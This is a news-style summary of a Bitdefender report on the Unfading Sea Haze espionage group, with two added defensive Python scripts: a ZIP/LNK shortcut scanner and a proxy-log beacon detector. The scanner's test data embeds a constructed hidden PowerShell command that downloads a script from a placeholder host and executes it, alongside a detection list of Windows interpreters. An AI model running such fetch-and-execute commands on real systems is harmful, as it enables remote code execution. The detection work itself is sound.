Breaking News: Beijing-Backed Hackers Infiltrate Southeast Asian Nations’ Computers

A previously unidentified cyber threat actor, suspected of having ties to China, has been targeting military and government organizations in the South China Sea region since 2018, according to a report released by the Romanian cybersecurity company Bitdefender. The group, which Bitdefender tracks as Unfading Sea Haze, is believed to operate independently of other known Chinese threat actors such as APT41.

Unfading Sea Haze does not appear to share tooling or techniques with APT41. The report points to a single similarity that could reflect shared coding practices within the Chinese cyber threat scene, but stresses that “no other overlaps with APT41’s known tools were identified.”

Since 2018, Unfading Sea Haze has targeted at least eight victims, primarily focusing on military and government targets in the region. The group is known for repeatedly regaining access to compromised systems.

One method the threat actors use to gain initial access is spear-phishing emails carrying malicious ZIP archives. The archives contain LNK files (Windows shortcuts) disguised as ordinary documents; when a victim opens one, the command line embedded in the shortcut runs and gives the attackers a foothold on the machine.
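A defender triaging mail attachments wants to see the shortcut's embedded command line before a user does. The script below is an added example, not Bitdefender's tooling: it walks a ZIP archive in memory, parses the StringData section of each `.lnk` member according to the MS-SHLLINK layout (header, optional IDList and LinkInfo, then the length-prefixed strings), and flags shortcuts whose target or arguments invoke a command interpreter or that carry a document-style double extension. The archive, the decoy file and the `cmd.exe`/`powershell` command line are constructed for the demonstration and are not the lures described in the report.

```python
"""Scan a ZIP for Windows shortcut (.lnk) members that launch an interpreter.
Added example for the ZIP+LNK initial-access pattern; sample archive and
command line are constructed, not taken from the Bitdefender report."""
import io
import re
import struct
import zipfile

# MS-SHLLINK ShellLinkHeader constants
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_IDLIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData fields appear in this fixed order when their flag is set.
STRING_FIELDS = [
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
]

# Interpreters / LOLBins an LNK lure typically points at (assumed list; extend as needed).
INTERPRETERS = re.compile(
    r"(cmd|powershell|pwsh|mshta|wscript|cscript|rundll32|regsvr32|certutil)(\.exe)?\b",
    re.IGNORECASE,
)
DOC_DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt)\.lnk$", re.IGNORECASE)


def parse_lnk(data):
    """Return (LinkFlags, StringData dict) from raw .lnk bytes; IDList/LinkInfo are skipped."""
    if len(data) < LNK_HEADER_SIZE:
        raise ValueError("too short for a ShellLinkHeader")
    size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a ShellLink header")
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_IDLIST:      # IDListSize (u16) + items
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:               # LinkInfoSize (u32) includes itself
        off += struct.unpack_from("<I", data, off)[0]
    strings = {}
    for flag, key in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]   # CountCharacters, no terminator
        off += 2
        if flags & IS_UNICODE:
            strings[key] = data[off:off + 2 * count].decode("utf-16-le", "replace")
            off += 2 * count
        else:
            strings[key] = data[off:off + count].decode("cp1252", "replace")
            off += count
    return flags, strings


def scan_zip(zip_bytes):
    """Flag .lnk members whose target or arguments invoke an interpreter."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            try:
                _, s = parse_lnk(zf.read(info))
            except (ValueError, struct.error):
                continue                    # malformed shortcut: not parseable, skip
            target = (s.get("relative_path", "") + " " + s.get("arguments", "")).strip()
            reasons = []
            if INTERPRETERS.search(target):
                reasons.append("launches interpreter")
            if DOC_DOUBLE_EXT.search(info.filename):
                reasons.append("document-style double extension")
            if reasons:
                findings.append({"member": info.filename, "target": target, "reasons": reasons})
    return findings


def build_lnk(relative_path, arguments):
    """Minimal Unicode .lnk carrying only RelativePath and Arguments (test data only)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sI", LNK_HEADER_SIZE, LNK_CLSID, flags)
    header += b"\x00" * (LNK_HEADER_SIZE - len(header))   # attributes/timestamps zeroed
    body = b""
    for text in (relative_path, arguments):
        body += struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + body


def sample_archive():
    """Constructed lure: a benign decoy plus a document-looking shortcut."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Doc/readme.txt", "decoy content")
        zf.writestr("Doc/Doc.pdf.lnk", build_lnk(
            r"..\..\..\Windows\System32\cmd.exe",
            '/c powershell -nop -w hidden -c "iwr http://example.invalid/s.ps1 | iex"',
        ))
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_zip(sample_archive()):
        print(f["member"], "->", f["target"], f["reasons"])
```

The parser deliberately ignores the IDList and LinkInfo blocks, which is enough to reach the command line; a production scanner should also read the optional ExtraData blocks at the end of the file, where an attacker can stash environment-variable targets that bypass the RelativePath check.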

Some of the ZIP archive names used by the group include “Data,” “Doc,” and “Startechup_fINAL.” In March 2024, Unfading Sea Haze started using new ZIP archive names such as “Assange_Labeled_an_‘Enemy’_of_the_US_in_Secret_Pentagon_Documents102” and “Presidency of Barack Obama.” Other archives were named to look like installers, updaters, or documents for Microsoft Windows Defender.

Once the attackers have gained access to their targets’ systems, they use a combination of custom and off-the-shelf tools to collect data. One such custom tool is a keylogger named “xkeylog,” which captures keystrokes on victim machines. Another is a browser data stealer that targets information stored by browsers such as Google Chrome, Firefox, Microsoft Edge, and Internet Explorer.

A third custom tool lets Unfading Sea Haze monitor for portable devices on compromised systems. “The tool checks for WPD or USB every 10 seconds. If a device is mounted, it gathers details about the device and sends them using HTTP GET request to an attacker-controlled server,” the report explains.
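Exfiltration over plain HTTP GET is something a web proxy sees, and the report's later recommendation to monitor network traffic is only useful with a concrete check. The script below is an added example, not part of the report: it parses proxy log lines, groups GET requests by (client, destination host), and surfaces pairs where one client keeps contacting one external host at a near-constant interval (low coefficient of variation of the inter-request gaps). The report does not say the USB monitor sends on a fixed schedule, so this is a generic low-jitter beacon hunt rather than a signature for that tool; the log format, hosts and timestamps are constructed for the demonstration.

```python
"""Low-jitter HTTP GET hunt over proxy logs.  Added example; the log lines,
hosts and format below are constructed and not taken from the report."""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed layout: "<ISO timestamp> <client> <method> <url> <status>"
LINE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")
HOST = re.compile(r"^https?://([^/:]+)")

# Constructed sample: 10.0.0.5 polls hidden-update.invalid every ~10 s while
# also browsing www.example.com at irregular intervals.
SAMPLE_LOG = """
2024-03-12T09:00:00 10.0.0.5 GET http://hidden-update.invalid/check 200
2024-03-12T09:00:03 10.0.0.5 GET http://www.example.com/ 200
2024-03-12T09:00:05 10.0.0.5 POST http://www.example.com/login 302
2024-03-12T09:00:08 10.0.0.5 GET http://www.example.com/home 200
2024-03-12T09:00:10 10.0.0.5 GET http://hidden-update.invalid/check 200
2024-03-12T09:00:20 10.0.0.5 GET http://hidden-update.invalid/check 200
2024-03-12T09:00:31 10.0.0.5 GET http://hidden-update.invalid/check 200
2024-03-12T09:00:41 10.0.0.5 GET http://hidden-update.invalid/check 200
2024-03-12T09:00:50 10.0.0.5 GET http://hidden-update.invalid/check 200
2024-03-12T09:01:00 10.0.0.5 GET http://hidden-update.invalid/check 200
2024-03-12T09:01:10 10.0.0.5 GET http://hidden-update.invalid/check 200
2024-03-12T09:02:08 10.0.0.5 GET http://www.example.com/news 200
2024-03-12T09:02:11 10.0.0.5 GET http://www.example.com/news/1 200
2024-03-12T09:03:11 10.0.0.5 GET http://www.example.com/news/2 200
2024-03-12T09:03:12 10.0.0.5 GET http://www.example.com/css/a.css 200
2024-03-12T09:07:12 10.0.0.5 GET http://www.example.com/news/3 200
""".strip().splitlines()


def parse(lines):
    """Map (client, host) -> sorted list of GET timestamps in epoch seconds."""
    events = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if not m or m["method"] != "GET":
            continue
        h = HOST.match(m["url"])
        if not h:
            continue
        events[(m["src"], h.group(1))].append(datetime.fromisoformat(m["ts"]).timestamp())
    for ts in events.values():
        ts.sort()
    return events


def beacon_candidates(lines, min_requests=6, max_cv=0.2, allow=()):
    """Return (client, host) pairs whose GET inter-arrival gaps are nearly constant.

    min_requests avoids judging a handful of hits; max_cv is the maximum
    stdev/mean of the gaps; allow lists hosts known to poll legitimately."""
    out = []
    for (src, host), ts in parse(lines).items():
        if host in allow or len(ts) < min_requests:
            continue
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        mean = statistics.mean(gaps)
        if mean == 0:
            continue                      # burst of identical timestamps, not a schedule
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            out.append({"src": src, "host": host, "requests": len(ts),
                        "interval_s": round(mean, 1), "cv": round(cv, 3)})
    return sorted(out, key=lambda r: r["cv"])


if __name__ == "__main__":
    for hit in beacon_candidates(SAMPLE_LOG):
        print(hit)
```

Tune `min_requests` and `max_cv` against a baseline of your own traffic and keep the allowlist short; update services and telemetry agents also poll on a schedule, which is exactly why a hit is a lead to pivot on (destination reputation, process on the endpoint, request sizes) rather than an alert on its own.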

Additionally, Unfading Sea Haze collects data from messaging apps including Telegram and Viber, and manually packages collected data with the RAR archiving tool. “This blend of custom and off-the-shelf tools, along with manual data extraction, paints a picture of a targeted espionage campaign focused on acquiring sensitive information from compromised systems,” the report reads.

The threat group managed to operate undetected for over five years, which is particularly concerning. The attackers demonstrated a sophisticated approach to cyberattacks and evasion techniques that have allowed them to remain under the radar for so long.

Bitdefender researchers have made their findings public in hopes of helping the security community detect and disrupt these espionage efforts by Unfading Sea Haze and other similar threat actors. The report concludes with some recommendations on how to mitigate risks posed by this group, including prioritizing patch management, enforcing strong password policies, monitoring network traffic, and collaborating with the cybersecurity community.
